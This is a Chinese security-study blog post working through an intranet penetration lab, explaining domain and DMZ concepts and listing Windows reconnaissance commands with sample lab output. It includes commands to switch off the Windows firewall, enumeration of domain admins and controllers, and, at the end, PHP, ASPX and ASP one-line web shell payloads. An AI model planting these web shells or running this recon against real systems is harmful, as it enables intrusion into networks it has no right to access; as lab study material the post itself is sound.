<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="utf-8" />
   
  <meta name="keywords" content="生活,旅行,思考,代码,博客" />
   
  <meta name="description" content="一生努力" />
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <title>
    渗透实战学习 |  0Rld
  </title>
  <meta name="generator" content="hexo-theme-yilia-plus">
  
  <link rel="shortcut icon" href="/favicon.ico" />
  
  
<link rel="stylesheet" href="/css/style.css">

  
<script src="/js/pace.min.js"></script>


  

  

<link rel="alternate" href="/atom.xml" title="0Rld" type="application/atom+xml">
<link rel="stylesheet" href="/css/prism.css" type="text/css"></head>

</html>
<script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
<body>
  <div id="app">
    <main class="content">
      <section class="outer">
  <article id="post-渗透实战学习" class="article article-type-post" itemscope
  itemprop="blogPost" data-scroll-reveal>

  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  渗透实战学习
</h1>
  

    </header>
    

    
    <div class="article-meta">
      <a href="/2020/04/23/%E6%B8%97%E9%80%8F%E5%AE%9E%E6%88%98%E5%AD%A6%E4%B9%A0/" class="article-date">
  <time datetime="2020-04-23T07:13:23.000Z" itemprop="datePublished">2020-04-23</time>
</a>
      
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E6%B8%97%E9%80%8F%E4%B9%8B%E8%B7%AF/">渗透之路</a>
  </div>

      
      
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> 字数统计:</span>
            <span class="post-count">2.6k字</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> 阅读时长≈</span>
            <span class="post-count">9分钟</span>
        </span>
    </span>
</div>

      
    </div>
    

    
    
    <div class="tocbot"></div>





    

    
    <div class="article-entry" itemprop="articleBody">
      


      

      
      <hr>
<p>光看书不动手是无法更深刻理解的，一开始还是跟着大佬的步骤走，再自己复现一遍，尽可能搞懂每一步！</p>
<h2 id="1-内网基础知识"><a href="#1-内网基础知识" class="headerlink" title="1.内网基础知识"></a>1.内网基础知识</h2><p><strong>工作组：</strong>在工作组中的网络可以互相访问对方的共享资源，主要按部门或者功能进行分组</p>
<p><strong>域（Domain）：</strong>是一个有安全边界的计算机集合，可以理解为升级版的工作组，但域的安全管理控制机制更加严格。用户必须以合法的身份登录域，且用户的权限是根据用户在域中的身份决定的。</p>
<p><strong>域控制器（DC）：</strong>可以理解为一个单位的门禁系统，负责所有连入的计算机和用户的验证工作</p>
<p>域控制器存在这个域所有账户、密码等信息的数据库</p>
<p>域中一般有以下几个环境：</p>
<p><strong>单域：</strong>在一个地理位置固定的小公司，建立一个域就可以了。一般一个域至少两台域服务器，一个作为DC，另一台作为备份DC。</p>
<p>父域和子域：第一个创建的域为父域，各分部的域称为该域的子域。例如一个大公司的各个分公司位于不同的地点，就需要用到父域和子域。因为在同一个域当中，信息交互是比较多的，而且不能压缩。而不同域信息交互比较少，而且可以压缩。同时也为了安全考虑，每个域都有自己的安全策略，比如财务部希望使用特定的安全策略（包括账号密码策略）</p>
<p><strong>域树：</strong>是多个域通过建立信任关系组成的集合</p>
<p>（父）abc.com —-asia.abc.com ——cn.asia.abc.com（子）</p>
<p>abc.com—–europe.abc.com—–ft.asia.abc.com</p>
<p>子域只能使用父域的名字作为其域名的后缀</p>
<p><strong>域森林：</strong>多个域树建立信任关系组成的集合</p>
<p>比如abc.com要合并abc.net，但无法挂下，所以需要建立信任关系来构成</p>
<p><strong>域名服务器（Domain Name Server，DNS）：</strong>是指用于实现域名和与之相对应的IP地址转换的服务器</p>
<p>域树的域名和DNS域名非常相似，实际上，因为域中的计算机是使用DNS来定位域控制器、服务器以及其他计算机、网络服务的，所以域的名字就是DNS域的名字。</p>
<p><strong>在内网渗透中，大部分是通过寻找DNS服务器来确定域控制器的位置（这两者通常配值在一台机子上）</strong></p>
<p><strong>活动目录：</strong>是指域环境中提供目录服务的组件</p>
<p>域服务器和活动目录的区别：</p>
<p><strong>安全域的划分：</strong>划分安全域的目的是将安全等级相同的计算机划入同一网段，该网段的计算机拥有相同的网络边界，并在网络边界部署防火墙实现对其它安全域的网络访问控制策略。</p>
<p><strong>安全域一般分为DMZ和内网</strong></p>
<p>在一个用路由器连接的内网中，分为安全级别最高的内网、中等的DMZ、最低的外网。三个区域任务不同，访问策略不同</p>
<p><strong>DMZ称为隔离区</strong>，位于企业内部网络和外部网络之间。可以在其中放一些必须空开的服务器，如FTP、Web、论坛服务器</p>
<p>在网络边界上一般会部署防火墙及入侵检测等，如果有Web应用还会设置WAF，从而有效保护内网。</p>
<p>在配置一个拥有DMZ的网络时，通常需要定义如下访问控制策略，以实现屏障功能：</p>
<p><strong>1.内网可以访问外网：</strong>在这一策略中，防火墙需要执行NAT</p>
<p><strong>2.内网可以访问DMZ：</strong>内网用户可以管理DMZ中的服务器</p>
<p><strong>3.外网不能访问内网：</strong>如果要访问，要通过VPN</p>
<p><strong>4.外网可以访问DMZ：</strong>需要由防火墙来完成从对外地址到服务器实际地址的转换</p>
<p><strong>5.DMZ不能访问内网、不能访问外网：</strong>保护内网</p>
<p><strong>内网又可以划分为办公区和核心区：</strong></p>
<p>办公区：公司员工日常的工作区，攻击者如果想进入内网，一般会使用<strong>鱼叉攻击、水坑攻击</strong>、社工等</p>
<p>核心区：存储企业最重要的数据等信息资产，通过日志记录、安全审计等安全措施进行严密的保护</p>
<p>一般来讲，能直接访问的只有运维人员或者IT部门的主管，所以攻击者会重点关注这些用户的信息</p>
<p><strong>（攻击者在内网中进行横向移动攻击时，会优先查找这些主机）</strong></p>
<p><strong>桥接模式：</strong>在桥接网络中，虚拟机是独立的机器。虚拟机和主机就好比插在同一台交换机上的两台计算机。如果主机连接到开启了DHCP服务的(无线)路由器上，虚拟机就可以自动获取IP地址，反之需要手动配值。只要IP地址在同一网段内，局域网内所有同网段的计算机就能够互访，这样虚拟机就可以上网了。</p>
<p><strong>NAT模式(Network Address Translator):</strong>表示网络地址转换，虚拟机通过与物理机的连接来访问网络。虚拟机能够访问主机所在局域网内所有同网段的计算机，但是除了主机，局域网内的其它计算机都无法访问虚拟机。</p>
<p><strong>Host-only模式:</strong>虚拟机处于一个独立的网段中，此模式下的虚拟机是无法上网的，但是可以通过windows提供的连接共享功能实现共享上网，主机能与所有虚拟机互访。如果没用开启windows的连接共享功能，除了主机，虚拟机与主机所在局域网内的所有其他计算机之间都无法访问。</p>
<hr>
<p>kail ip:192.168.126.1</p>
<p>win7 ip:192.168.52.143  /   外网：192.168.126.128</p>
<p>winK3 ip:192.168.52.141</p>
<p>win2008: 密码改为hongri@2019  ip:192.168.52.138</p>
<p>netstat -an 查看被打开的端口列表</p>
<p>netstat -ano | findstr “80” 查看某个具体端口的占用情况</p>
<p>tasklist | findstr “680”  查看具体哪个应用被占用了</p>
<h2 id="2-内网信息收集"><a href="#2-内网信息收集" class="headerlink" title="2.内网信息收集"></a><strong>2.内网信息收集</strong></h2><h3 id="2-1-收集本机信息"><a href="#2-1-收集本机信息" class="headerlink" title="2.1 收集本机信息"></a><strong>2.1 收集本机信息</strong></h3><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">ipconfig /all 　　　　　  <span class="comment">#查询本机IP段，所在域等 </span></span><br><span class="line">systeminfo | findstr /B /C:<span class="string">"OS 名称"</span> /C:<span class="string">" OS 版本"</span> <span class="comment">#查询操作系统版本</span></span><br><span class="line">systeminfo | findstr /B /C:<span class="string">"OS Name"</span> /C:<span class="string">" OS VERSION"</span> <span class="comment">#英文版</span></span><br><span class="line">echo %PROCESSOR_ARCHITECTURE% <span class="comment">#查看系统体系结构  ---x86 、 amd64</span></span><br><span class="line">wmic service list brief <span class="comment">#查询本机服务信息</span></span><br><span class="line">tasklist | findstr <span class="string">"680"</span>  <span class="comment">#查看具体哪个应用被占用了,tasklist查看当前进程</span></span><br><span class="line">wmic <span class="keyword">process</span> list brief <span class="comment">#查看进程信息</span></span><br><span class="line">wmic startup get command,caption <span class="comment">#查看启动程序信息</span></span><br><span class="line">schtasks /query /fo LIST /v <span class="comment">#查看计划任务</span></span><br><span class="line">net statistics workstation <span class="comment">#查看主机开机时间</span></span><br><span class="line">net user 　　　　　　　   <span class="comment">#本机用户列表 ---可以分析内网机器的命名规则</span></span><br><span class="line">net localgroup administrators          <span class="comment">#本机管理员[通常含有域用户]</span></span><br><span class="line">query user || qwinsta  <span class="comment">#查看当前在线用户</span></span><br><span class="line">net session <span class="comment">#列出或断开本地计算机与所连接的客户端之间的会话</span></span><br><span class="line">netstat <span class="literal">-ano</span> <span class="comment">#查看所有占用端口的列表</span></span><br><span class="line">systeminfo <span class="comment">#查看系统的详细信息，需要注意系统的版本、补丁信息等</span></span><br><span class="line">wmic qfe get Caption,Description,HotFixID,Installedon <span class="comment">#查看安装在系统中的补丁</span></span><br><span class="line">net share <span class="comment">#查询本机共享列表和可访问的域共享列表</span></span><br><span class="line">route print</span><br><span class="line">arp <span class="literal">-a</span>  <span class="comment">#查询路由表以及所有可用接口的ARP缓存表</span></span><br></pre></td></tr></table></figure>

<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">###查询防火墙相关配值###</span></span><br><span class="line">netsh firewall set opmode disable <span class="comment">#关闭防火墙 win2003及之前的版本</span></span><br><span class="line">netsh advfirewall set allprofiles state off <span class="comment">#之后的版本</span></span><br><span class="line">netsh firewall show config <span class="comment">#查看防火墙的配值</span></span><br></pre></td></tr></table></figure>

<h3 id="2-2查询当前权限"><a href="#2-2查询当前权限" class="headerlink" title="2.2查询当前权限"></a><strong>2.2查询当前权限</strong></h3><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">whoami <span class="comment">#查看当前权限</span></span><br><span class="line">whoami /all <span class="comment">#获取域SID</span></span><br><span class="line">net user 用户名 /domain   <span class="comment">#获取指定用户的账户信息</span></span><br></pre></td></tr></table></figure>

<h3 id="2-3判断是否存在域"><a href="#2-3判断是否存在域" class="headerlink" title="2.3判断是否存在域"></a><strong>2.3判断是否存在域</strong></h3><p>获得了本机的相关信息后，就要判断当前内网中是否存在域。<strong>如果当前内网中存在域，就需要判断所控主机是否在域内</strong></p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#查看本机是否和DNS服务器处于同一网段</span></span><br><span class="line">C:\phpStudy\WWW\yxcms\protected\apps\default\view\default&gt; ipconfig /all</span><br><span class="line">Windows IP 配置</span><br><span class="line">   主机名  . . . . . . . . . . . . . : stu1</span><br><span class="line">   主 DNS 后缀 . . . . . . . . . . . : god.org</span><br><span class="line">   节点类型  . . . . . . . . . . . . : 混合</span><br><span class="line">   IP 路由已启用 . . . . . . . . . . : 否</span><br><span class="line">   WINS 代理已启用 . . . . . . . . . : 否</span><br><span class="line">   DNS 后缀搜索列表  . . . . . . . . : god.org</span><br><span class="line"></span><br><span class="line"><span class="comment">#判断域控制服务器是否和DNS服务器在同一台服务器上</span></span><br><span class="line">C:\phpStudy\WWW\yxcms\protected\apps\default\view\default&gt; nslookup god.org</span><br><span class="line">非权威应答:</span><br><span class="line">服务器:  UnKnown</span><br><span class="line">Address:  <span class="number">192.168</span>.<span class="number">126.2</span></span><br><span class="line">名称:    god.org</span><br><span class="line">Addresses:  <span class="number">23.253</span>.<span class="number">58.227</span></span><br><span class="line">      <span class="number">176.34</span>.<span class="number">241.253</span></span><br><span class="line">      <span class="number">162.242</span>.<span class="number">150.89</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#查看域名、登录服务器为域控制器   如果域为WORKGROUP 表示当前服务器不在域内</span></span><br><span class="line">C:\phpStudy\WWW\yxcms\protected\apps\default\view\default&gt; systeminfo</span><br><span class="line">虚拟内存: 可用:   <span class="number">2</span>,<span class="number">765</span> MB</span><br><span class="line">虚拟内存: 使用中: <span class="number">1</span>,<span class="number">330</span> MB</span><br><span class="line">页面文件位置:     C:\pagefile.sys</span><br><span class="line">域:               god.org</span><br><span class="line">登录服务器:       \\OWA</span><br><span class="line"></span><br><span class="line">net config Workstation  <span class="comment">#当前计算机名，全名，用户名，系统版本，工作站域，登陆域 </span></span><br><span class="line"></span><br><span class="line"><span class="comment">#查询当前登录域及登录用户信息</span></span><br><span class="line">C:\phpStudy\WWW\yxcms&gt; net config Workstation</span><br><span class="line">计算机名                     \\STU1</span><br><span class="line">计算机全名                   stu1.god.org</span><br><span class="line">用户名                       Administrator</span><br><span class="line">工作站域                     GOD</span><br><span class="line">工作站域 DNS 名称            god.org  <span class="comment">###当前登录域名</span></span><br><span class="line">登录域                       GOD   <span class="comment">#此处表示当前用户是域用户还是本地，，这里表示域用户</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#判断主域</span></span><br><span class="line">net time /domain        <span class="comment">#查看时间服务器，判断主域，主域服务器都做时间服务器</span></span><br><span class="line">通常有三种情况：</span><br><span class="line">存在域，但当前用户不是域用户----拒绝访问</span><br><span class="line">存在域，且是--<span class="literal">-xx</span>的当前时间是xxx</span><br><span class="line">当前网络环境是工作组----找不到域xx的域控制器</span><br></pre></td></tr></table></figure>

<h3 id="2-4探测域内存活主机"><a href="#2-4探测域内存活主机" class="headerlink" title="2.4探测域内存活主机"></a><strong>2.4探测域内存活主机</strong></h3><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">net user /domain        <span class="comment">#查看域用户</span></span><br><span class="line">net view /domain        <span class="comment">#查看有几个域</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">net group <span class="string">"domain computers"</span> /domain   <span class="comment">#查看域内所有的主机名 </span></span><br><span class="line">net group <span class="string">"domain admins"</span> /domain      <span class="comment">#查看域管理员 </span></span><br><span class="line">net group <span class="string">"domain controllers"</span> /domain <span class="comment">#查看域控</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">net group /domain                      <span class="comment">#查询域里面的工作组 </span></span><br><span class="line">net group 组名 /domain                  <span class="comment">#查询域中的某工作组</span></span><br></pre></td></tr></table></figure>



<p>一句话木马：</p>
<p>php一句话木马：<br>　　 <?php @eval($_POST[value]);?><br>　　<br>aspx一句话木马：<br>　　&lt;%@ Page Language=“Jscript”%&gt;<br>　　&lt;%eval(Request.Item[“value”])%&gt;<br>　　<br>asp一句话木马：<br>　　 &lt;%execute(request(“v”))%&gt;</p>

      
      <!-- reward -->
      
      <div id="reward-btn">
        打赏
      </div>
      
    </div>
    
    
      <!-- copyright -->
      
        <div class="declare">
          <ul class="post-copyright">
            <li>
              <i class="ri-copyright-line"></i>
              <strong>版权声明： </strong s>
              本博客所有文章除特别声明外，均采用 <a href="https://www.apache.org/licenses/LICENSE-2.0.html" rel="external nofollow"
                target="_blank">Apache License 2.0</a> 许可协议。转载请注明出处！
            </li>
          </ul>
        </div>
        
    <footer class="article-footer">
      
          
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        Share
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=https://cumtchen.gitee.io/2020/04/23/%E6%B8%97%E9%80%8F%E5%AE%9E%E6%88%98%E5%AD%A6%E4%B9%A0/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E6%B8%97%E9%80%8F/" rel="tag">渗透</a></li></ul>


    </footer>

  </div>

  
  
  <nav class="article-nav">
    
      <a href="/2020/05/19/sqli-labs/" class="article-nav-link">
        <strong class="article-nav-caption">Newer posts</strong>
        <div class="article-nav-title">
          
            sqli-labs
          
        </div>
      </a>
    
    
      <a href="/2020/04/22/MYSQL-SQL-BYPASS/" class="article-nav-link">
        <strong class="article-nav-caption">Older posts</strong>
        <div class="article-nav-title">MYSQL_SQL_BYPASS</div>
      </a>
    
  </nav>


  

  
  
<!-- valine评论 -->
<div id="vcomments-box">
    <div id="vcomments">
    </div>
</div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src='https://cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js'></script>
<script>
    new Valine({
        el: '#vcomments',
        app_id: '6tKR3VfNf8sE102pp4QlkOSM-gzGzoHsz',
        app_key: 'OVsjODdU2QixblMDCtzmEfYS',
        path: window.location.pathname,
        notify: '',
        verify: 'false',
        avatar: 'mp',
        placeholder: '给我的文章加点建议吧~',
        recordIP: true
    });
    const infoEle = document.querySelector('#vcomments .info');
    if (infoEle && infoEle.childNodes && infoEle.childNodes.length > 0) {
        infoEle.childNodes.forEach(function (item) {
            item.parentNode.removeChild(item);
        });
    }
</script>
<style>
    #vcomments-box {
        padding: 5px 30px;
    }

    @media screen and (max-width: 800px) {
        #vcomments-box {
            padding: 5px 0px;
        }
    }

    #vcomments-box #vcomments {
        background-color: #fff;
    }

    .v .vlist .vcard .vh {
        padding-right: 20px;
    }

    .v .vlist .vcard {
        padding-left: 10px;
    }
</style>

  

  
  
  

</article>
</section>
      <footer class="footer">
  <div class="outer">
    <ul class="list-inline">
      <li>
        &copy;
        2020
        0Rld
      </li>
      <li>
        
          Powered by
        
        
        <a href="https://hexo.io" target="_blank">Hexo</a> Theme <a href="https://github.com/Shen-Yu/hexo-theme-ayer" target="_blank">Ayer</a>
        
      </li>
    </ul>
    <ul class="list-inline">
      <li>
        
        
        <span>
  <i>PV:<span id="busuanzi_value_page_pv"></span></i>
  <i>UV:<span id="busuanzi_value_site_uv"></span></i>
</span>
        
      </li>
      <li>
        <!-- cnzz统计 -->
        
        <script type="text/javascript" src=''></script>
        
      </li>
    </ul>
  </div>
</footer>
    <div class="to_top">
        <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>
      </div>
    </main>
      <aside class="sidebar">
        <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/1.jpg" alt="0Rld"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">标签</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/2020/about">About</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="Search">
        <i class="ri-search-line"></i>
      </a>
      
      
      <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
        <i class="ri-rss-line"></i>
      </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
      </aside>
      <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>Buy me a cup of coffee~</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="/images/alipay.jpg">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="/images/wechat.jpg">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
      
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/jquery.justifiedGallery.min.js"></script>


<script src="/js/lazyload.min.js"></script>


<script src="/js/busuanzi-2.3.pure.min.js"></script>


<script src="/js/share.js"></script>



<script src="/fancybox/jquery.fancybox.min.js"></script>




<script>
  try {
    var typed = new Typed("#subtitle", {
    strings: ['四季更替，梦境更迭','生活,旅行,思考,代码,博客','努力一定会有所获！'],
    startDelay: 0,
    typeSpeed: 200,
    loop: true,
    backSpeed: 100,
    showCursor: true
    });
  } catch (err) {
  }
  
</script>




<script src="/js/tocbot.min.js"></script>

<script>
  // Tocbot_v4.7.0  http://tscanlin.github.io/tocbot/
  tocbot.init({
    tocSelector: '.tocbot',
    contentSelector: '.article-entry',
    headingSelector: 'h1, h2, h3, h4, h5, h6',
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer:'main',
    positionFixedSelector: '.tocbot',
    positionFixedClass: 'is-position-fixed',
    fixedSidebarOffset: 'auto',
    onClick: (e) => {
      $('.toc-link').removeClass('is-active-link');
      $(`a[href=${e.target.hash}]`).addClass('is-active-link');
      $(e.target.hash).scrollIntoView();
      return false;
    }
  });
</script>


<script>
  var ayerConfig = {
    mathjax: true
  }
</script>


<script src="/js/ayer.js"></script>


<script src="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.css">


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.css">
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script>



<script type="text/x-mathjax-config">
  MathJax.Hub.Config({
      tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
      }
  });

  MathJax.Hub.Queue(function() {
      var all = MathJax.Hub.getAllJax(), i;
      for(i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
      }
  });
</script>

<script src="https://cdn.jsdelivr.net/npm/mathjax@2.7.6/unpacked/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>


<script type="text/javascript" src="https://js.users.51.la/20544303.js"></script>
  </div>
</body>

</html>